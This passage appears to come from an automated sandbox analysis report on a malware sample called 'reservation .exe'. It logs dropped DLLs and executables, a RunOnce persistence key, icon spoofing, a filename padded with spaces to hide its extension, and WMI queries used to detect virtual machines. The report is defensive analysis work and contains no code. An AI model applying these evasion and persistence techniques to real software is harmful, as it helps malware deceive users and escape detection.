                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\quartz.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\ast.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libssl-1_1.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\fat\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\reservation .exeFile created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fatJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fatJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fatJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fatJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Icon mismatch, binary includes an icon from a different legit application in order to fool users
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: 111.png
                          Uses an obfuscated file name to hide its real file extension (a lot of spaces)
                          Source: Detected 46 consecutive spaces in filenameStatic PE information: reservation .exe
                          Source: C:\Users\user\Desktop\reservation .exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter
                          Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
